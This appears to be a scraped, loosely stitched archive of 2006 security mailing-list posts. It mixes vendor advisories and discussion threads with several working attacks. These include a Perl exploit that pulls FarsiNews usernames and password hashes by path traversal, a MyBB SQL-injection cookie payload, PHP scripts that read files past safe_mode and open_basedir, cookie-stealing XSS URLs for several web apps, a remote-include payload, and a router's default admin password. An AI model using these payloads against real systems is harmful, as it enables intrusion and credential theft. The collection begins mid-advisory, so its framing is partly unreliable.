cce2a463b57be400362624f09dc49a4fdde09305 fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v filename If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum filename 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0645 9. Contact: The Fedora Legacy security contact is [EMAIL PROTECTED]. More project details at http://www.fedoralegacy.org - signature.asc Description: OpenPGP digital signature
FarsiNews 2.5Pro Exploit
#!/usr/bin/perl # HESSAM-X # FarsiNews 2.5Pro Exploi # Exploit by Hessam-x (www.hessamx.net) #Iran Hackerz Security Team #WebSite: www.hackerz.ir # # Summery # Name: FarsiNews [www.farsinewsteam.com] # version : 2.5Pro ## # in FarsiNews if you change the archive value : # http://localhost/index.php?archive=hamid # see : # Warning: file([PATH]/data/archives/hamid.news.arch.php): # failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642 # Warning: file([PATH]/data/archives/hamid.comments.arch.php): # failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686 # ...[and many other error] # it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data . # we can change the archive value to '/../users.db.php%00' to see all username and password . # Exploit : # http://localhost/index.php?archive=/../users.db.php%00 # http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00 # F0und by hamid use LWP::Simple; print ---\n; print = Farsinews 2.5Pro=\n; print = By Hessam-x - www.hackerz.ir =\n; print ---\n\n; print Target(www.example.com)\ ; chomp($targ = STDIN); print Path: (/fn25/)\; chomp($path=STDIN); $url = index.php?archive=/../users.db.php%00; $page = get(http://.$targ.$path.$url) || die [-] Unable to retrieve: $!; print [+] Connected to: $targ\n; $page =~ m/img alt=(.*?) src=/ print [+] Username: $1\n; $page =~ m/style=border: none; align=right \/(.*?)\/font/ print [+] MD5 Password: $1\n; print [-] Unable to retrieve User ID\n if(!$1);
EJ3 TOPo - Cross Site Scripting Vulnerability
- Advisory: EJ3 TOPo Cross Site Scripting Vulnerability - Author: Yunus Emre Yilmaz || Yns [EMAIL PROTECTED] - Application: EJ3 TOPo ( http://ej3soft.ej3.net ) - Affected Version : v2.2.178 ( maybe older versions..) - Risk : Critical Details : If an attacker access /code/inc_header.php directly , he can bypass $gTopNomBer variable.(Register_globals must be on) Problem is about not defining or filtering the variable. Proof Of Concept : access /code/inc_header.php like inc_header.php?gTopNombre=scriptalert(document.cookie)/script and print users cookie.So an attacker can escape admins cookie. Release Date: 2006/02/28 Contacted to vendor : 2006/02/28
MyBB 1.3 NewSQL Injection
MyBB New SQL Injection
D3vil-0x1 Devil-00
Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320
The Inf.File :-
misc.php
Linez :-
[code]
$buddies = $mybb-user['buddylist'];
$namesarray = explode(,,$buddies);
if(is_array($namesarray))
{
while(list($key, $buddyid) = each($namesarray))
{
$sql .= $comma'$buddyid'; == HERE :) Uncleard Var !!
$comma = ,;
}
$timecut = time() - $mybb-settings['wolcutoff'];
$query = $db-query(SELECT u.*, g.canusepms FROM .TABLE_PREFIX.users
u LEFT JOIN .TABLE_PREFIX.usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN
($sql));
[/code]
From 255 to 265
The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies :)
Tested MyBB 1.3 .. Register_Globals = On
Explorer Exploit :-
1- Login by any username ..
2- Create new cookie (
name=
comma
value =
comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
FROM mybb_users WHERE uid=1/*
)
3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup
Where HOST = The Vic.Server And PATH = MyBB Dir.
QwikiWiki v1.4 XSS Vulnerability
Software - QwikiWiki Version - v1.4 Type - XSS Vulnerability Powered by QwikiWiki v1.4 - www.qwikiwiki.com Examples: http://(host)/index.php?page=body bgcolor=black/body http://(host)/index.php?page=alert(document.cookie);/script Found by Dr^Death of Suicide Scene Internet Security Group 2006
(PHP) imap functions bypass safemode and open_basedir restrictions
Vulnerability in c-client library (tested with versions 2000,2001,2004),
mail_open
could be used to open stream to local files.
For php and imap module
imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a
directory.
s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.
# code #
form action= method=post
select name=switch
option selected=selected value=fileView file/option
option value=dirView dir/option
/select
input type=text size=60 name=string
input type=submit value=go
/form
?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string $switch == file) {
$stream = imap_open($string, , );
if ($stream == FALSE)
die(Can't open imap stream);
$str = imap_body($stream, 1);
if (!empty($str))
echo pre.$str./pre;
imap_close($stream);
} elseif ($string $switch == dir) {
$stream = imap_open(/etc/passwd, , );
if ($stream == FALSE)
die(Can't open imap stream);
$string = explode(|,$string);
if (count($string) 1)
$dir_list = imap_list($stream, trim($string[0]),
trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), *);
echo pre;
for ($i = 0; $i count($dir_list); $i++)
echo $dir_list[$i]\n;
echo /pre;
imap_close($stream);
}
?
(PHP) mb_send_mail security bypass
Vulnerable: PHP4, PHP5
with use of sendmail 8.13.4
When safemode disabled and open_basedir restriction in effect, we can pass
extra parameters
to sendmail command in mail function, especially the -C and -X arguments.
-C for alternate configuration file
-X to log all in a file
Can be used to view files, pass the file to view to C argument and store
content in file
passed to X argument.
When safemode enabled and open_basedir restriction in effect, we can pass extra
parameters
to sendmail command in mb_send_mail function.
Solution:
Use other sendmail command and don't allow extra parameters for mb_send_mail
when safemode enabled
?php
if (isset($_REQUEST['file'])) {
$file = sendlog;
if (file_exists($file)) unlink($file);
$extra = -C .$_REQUEST['file']. -X .getcwd()./.$file;
mb_send_mail(NULL, NULL, NULL, NULL, $extra);
echo pre.file_get_contents($file)./pre;
}
?
[security bulletin] SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00601530 Version: 1 HPSBMA02099 SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-02-09 Last Updated: 2006-02-27 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP System Management Homepage (SMH) versions 2.0.0 through 2.1.4 running on Microsoft Windows. The vulnerability could be exploited remotely to allow unauthorized access to files via directory traversal. References: None SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) versions 2.0.0 through 2.1.4 running on Microsoft Windows 2000, 2003, 2003 for x64, 2003 for Itanium and also Windows XP BACKGROUND RESOLUTION HP is providing the following workaround for this issue until such time as another resolution is available. At that time this Security Bulletin will be re-released with the latest information. This workaround involves manually editing the .namazurc file in the HP SMH installation as described below: This requires a single line modification to the resource file. The affected file is located in the installdir\data\help\web_cgi directory and is called .namazurc. NOTE:installdir is the base directory where HP SMH is installed. A typical default installation would be C:\hp\hpsmh for installdir First, copy the .namazurc file to a backup location. If there are problems during the editing process, the original file can be restored. Next, edit the .namazurc file. Search for #Lang in the file to find the following text: #Lang ja Depending on the language and version of HP SMH installed, use the appropriate method below to edit the file: * If the HP SMH installation is an English language installation, change the line to: Lang en * If the HP SMH installation is a Japanese language installation AND the version of HP SMH is 2.0.0 through 2.1.3, change the line to: Lang ja * If the HP SMH installation is a Japanese language installation AND the version of HP SMH is 2.1.4, change the line to: Lang ja_JP.SJIS NOTE: The # at the beginning of the text must be removed. To complete the change, save the edited .namazurc file and restart HP SMH. PRODUCT SPECIFIC INFORMATION HISTORY: Version: 1 (rev.1) Initial release - 27 February 2006 Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take
Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability
I checked this against my 602v1 also last night, no go James Garrison wrote: Not my WG602v2. [EMAIL PROTECTED] wrote: Netgear WG602 reportedly contains a default administrative account. This issue can allow a remote attacker to gain administrative access to the device. super_username=Gearguy super_passwd=Geardog
[ MDKSA-2006:051 ] - Updated gettext packages fix temporary file vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:051 http://www.mandriva.com/security/ ___ Package : gettext Date: February 28, 2006 Affected: Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: The Trustix developers discovered temporary file vulnerabilities in the autopoint and gettextize scripts, part of GNU gettext. These scripts insecurely created temporary files which could allow a malicious user to overwrite another user's files via a symlink attack. The updated packages have been patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0966 ___ Updated Packages: Corporate 3.0: 3e90a65b63c6cef50ea2362b97d601af corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.i586.rpm 88645a36cc137b6d15baff31df84bb5f corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.i586.rpm 122cf7a4d0173cd80c3c6a388b76ec5a corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.i586.rpm d9e9d121c5833e80c9bbd642af24fb40 corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.i586.rpm 7aa6d70debb3c1814333fca662e23cac corporate/3.0/RPMS/libgettextmisc-0.13.1-1.3.C30mdk.i586.rpm cfe279f682d65f910505e069b911d7c7 corporate/3.0/RPMS/libintl2-0.13.1-1.3.C30mdk.i586.rpm fc15df73311804bf0fd371fa9682c0c5 corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm Corporate 3.0/X86_64: c3648f970e7794014773ddedd68eaf91 x86_64/corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.x86_64.rpm d876576394822262df7e2351775c1aaa x86_64/corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.x86_64.rpm af77cf6ee5a7d238ec122fbc4af7d353 x86_64/corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.x86_64.rpm 1173d049f6621cd8ff8d0396d24eb097 x86_64/corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.x86_64.rpm f757f8a584bfc7ebd99d13a92415241b x86_64/corporate/3.0/RPMS/lib64gettextmisc-0.13.1-1.3.C30mdk.x86_64.rpm ecb7b9c26a607287c10f12bc70d5ffa9 x86_64/corporate/3.0/RPMS/lib64intl2-0.13.1-1.3.C30mdk.x86_64.rpm fc15df73311804bf0fd371fa9682c0c5 x86_64/corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm Multi Network Firewall 2.0: bf7a130a64632e27c4c0e35bcce1838d mnf/2.0/RPMS/gettext-0.13.1-1.3.M20mdk.i586.rpm 26b569b31b5786eb3dc90c466ad42951 mnf/2.0/RPMS/gettext-base-0.13.1-1.3.M20mdk.i586.rpm 513319968508b7d6c22135aed2a4ebcf mnf/2.0/RPMS/gettext-devel-0.13.1-1.3.M20mdk.i586.rpm 8ebc491dd574ec6e9624776b39adb08e mnf/2.0/RPMS/gettext-java-0.13.1-1.3.M20mdk.i586.rpm d7efcc35298ade62c0d21b75cec11d35 mnf/2.0/RPMS/libgettextmisc-0.13.1-1.3.M20mdk.i586.rpm d0993ab7f263642207f1ae95f4861525 mnf/2.0/RPMS/libintl2-0.13.1-1.3.M20mdk.i586.rpm 76fec48911a57db5edad551ae40cb3d1 mnf/2.0/SRPMS/gettext-0.13.1-1.3.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFEBKdDmqjQ0CJFipgRAhZHAJ9pXeM/Z7BFLAZ1zymn5CDFGiDNjQCgyy01 o5an648yuWxgj8BfvaEBjws= =aKl0 -END PGP SIGNATURE-
PEHEPE Membership Management System Multiple Vulnerabilities
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities - Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com - Application: PEHEPE MemberShip Management System (http://www.pehepe.org/UYEL#304;K3) - Affected Version : v3 ( maybe older versions..) - Risk : Critical -- Details[0] : XSS Vulnerability An attacker can manupulate the value of $kul_adi, if s/he opens sol_menu.php directly. Sol_menu.php is an included page, but the attacker can access it directly. So, the value of $kul_adi can be changed from the address bar. -- Proof of Concept: http://target_site/script_path/sol_menu.php?kuladi=;scriptalert(document.cookie)/script -- Details[1] :Remote Code Execution Vulnerability There is a require command in sol_menu.php. The attacker can bypass the constant UYE_SEVIYE using a , querystring like misafir[]=UYE_SEVIYE. So the remote code is executing. As a result, the attacker can change the value of the first parameter of the require function which is named as uye_klasor.(dir for remote url) -- Proof Of Concept: sol_menu.php?uye_klasor=http://www.example.orgmisafir[]=UYE_SEVIYE -- Note : For using these vulnerabilities, register_globals must be on. Original URL : http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/
bttlxeForum 2.* XSS Vulnerability
Summary Software: bttlxeForum Sowtware's Web Site: http://www.bttlxe.com/ Versions: 2.* Type: Cross-Site Scripting Class: Remote Exploit: Available Solution: Not Available Discovered by: runvirus (worlddefacers.de securitycentra.com) -Description--- Vulnerable Script: failure.asp --Exploit-- http://www.example.comforums/failure.asp?err_txt=scriptalert(document.cookie);/script --Solution- No Patch available. --Credit--- Discovered by: runvirus (worlddefacers.de securitycentra.com)
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
Hello, If you carefully look at the inline attachments, you will find this (first proof of concept) : htmlhead/headbody style=margin: 0px; padding: 0px; border: 0px;iframe src=http://www.sysdream.com; width=100% height=100% frameborder=0 marginheight=0 marginwidth=0/iframe The information disclosure doesn't come from the first iframe, but from the second one. Indeed, the inline attachment basic.html itself contains a iframe, which is not correctly filtered and makes Thunderbird fetch any external resource. Best regards, Renaud Lifchitz http://www.sysdream.com Daniel Veditz wrote: Renaud Lifchitz wrote: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities We believe this to be a testing error. The problem of loading remote iframe and css content was fixed prior to the release of Mozilla Thunderbird 1.0 The testcase included in the advisory contains the iframe and css content in-line with the message. That will always be shown as there is no privacy issue with doing so and does not demonstrate the remote loading issue claimed. Once a user has pressed the Show Images button--not the best label since it covers all remote content--that state is stored in the mailbox metadata/index file (.msf) and the remote content will then be loaded on future viewings. If the .msf file is not deleted between tests this could give the appearance of the bug described in the advisory. There is a minor residual privacy issue if people whose mail you keep and reread are setting webbugs on you (your boss could find out how many times you read his memo?), but in most cases your privacy is fully blown once you load the remote content the first time.
recursive DNS servers DDoS as a growing DDoS problem
Hi guys. We discussed recursive DNS servers before (servers which allow to query anything - including what they are not authoritative for, through them). The attack currently in the wild is a lot bigger and more complicated than this, but to begin, here is an explanation (by metaphor) of that part: Spoofed ICMP attacks have been around for a while. How many of us still get quite a bit of ICMP echo replies stopped at our borders? These replies come to us due to spoofed attacks using our addresses. Now, imagine it - only bigger: Smurf. Introduce an amplification effect. As bigger UDP packets will be fragmented by the servers, and UDP obviously does not do any handshake and can easily be spoofed... The server receives a large packet, breaks it down to several fragments and moves the query on. That's where the amplification effect _starts_. Both the attacked server and the unwilling participant in the attack, the recursive servers, experience a serious DNS denial of service that keeps getting amplified considerably. One of the problems is obviously the spoofing. Let us, metaphorically and WRONGLY treat it for a minute as the remote exploit. The second part of this problem is the recursive server, which for the moment we will WRONGLY treat as the local exploit. Obviously both need to be fixed. Which is easier I am not so sure. In the past, most network operators refused to implement best practices such as BCP38 (go Fergie!) because they saw no reason for the hassle. Returning back to: if it isn't being exploited right now, why should I worry about it? Well, it is being exploited now, and will be further exploited in the future. Combating spoofing on the Internet is indeed important and now becoming critical. Removing the spoofing part for a second, the attack vector for this can easily be replaced, as one example, with a botnet. A million Trojaned hosts sending in even one packet a minute would cause quite a buzz - and do. Now amplify the effect by the recursive servers and... So, putting the spoofing aside, what do we do about our recursive servers? There are some good URL's for that, here are some: http://www.us-cert.gov/reading_room/DNS-recursion121605.pdf http://cc.uoregon.edu/cnews/winter2006/recursive.htm http://dns.measurement-factory.com/surveys/sum1.html The recursive behaviour is necessary for some authoritative servers, but not for all. As a best practice for organizations, as an example, the server facing the world should not also be the one facing your organization (your users/clients). Limiting this ability to your network space is also a good idea. If you would like to check for yourselves, here is a message from Duane Wessels [1] to the DNS-operations [2] mailing list where this is currently being discussed: - If anyone has the need to test particular addresses for the presence of open resolvers, please feel free to use this tool: http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl It will send a single recursion desired query to a target address. If that query is forwarded to our authoritative server, the host has an open resolver running at that address. - Dan (DA MAN) Kaminsky and Mike Schiffman have done some impressive work on this subject, outlined in Dan's latest ShmooCon talk. They found ~580K open resolvers: http://deluvian.doxpara.com/, http://www.doxpara.com/ I suggest those of us who need more information or help go to the DNS-operations mailing list from OARC (see below) and ask the experts there, now that this is finally public. Thanks, Gadi. [1] Duane Wessels - DNS genius and among other accomplishments the author of dns top. [2] DNS-operations - http://lists.oarci.net/mailman/listinfo/dns-operations -- http://blogs.securiteam.com/ Out of the box is where I live. -- Cara Starbuck Thrace, Battlestar Galactica.
Re: Bypass Fortinet anti-virus using FTP
Information pertaining to this vulnerability has been posted on Fortinet's security advisories web page. http://www.fortinet.com/FortiGuardCenter/ftp_vuln.html On this page, we can read Fortinet advises that a RECENTLY discovered vulnerability It was just discovered and announced to Fortinet SEVEN MONTHS ago ! Remember the time line: http://mdessus.free.fr/fortinet/av_bypass.txt
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
Renaud Lifchitz wrote: Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities We believe this to be a testing error. The problem of loading remote iframe and css content was fixed prior to the release of Mozilla Thunderbird 1.0 The testcase included in the advisory contains the iframe and css content in-line with the message. That will always be shown as there is no privacy issue with doing so and does not demonstrate the remote loading issue claimed. Once a user has pressed the Show Images button--not the best label since it covers all remote content--that state is stored in the mailbox metadata/index file (.msf) and the remote content will then be loaded on future viewings. If the .msf file is not deleted between tests this could give the appearance of the bug described in the advisory. There is a minor residual privacy issue if people whose mail you keep and reread are setting webbugs on you (your boss could find out how many times you read his memo?), but in most cases your privacy is fully blown once you load the remote content the first time.
Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities
Daniel Veditz wrote: [a plain text message] Just got half a dozen bounces because my plain-text email supposedly contained Suspicious I-Frame.a (Malicious Mobile Code) virus. Those of you behind McAfee GroupShield barriers may not be getting the whole conversation here if people can't even use words like i-frame in plain text without being suppressed as a virus. (remove the hyphen in i-frame throughout)
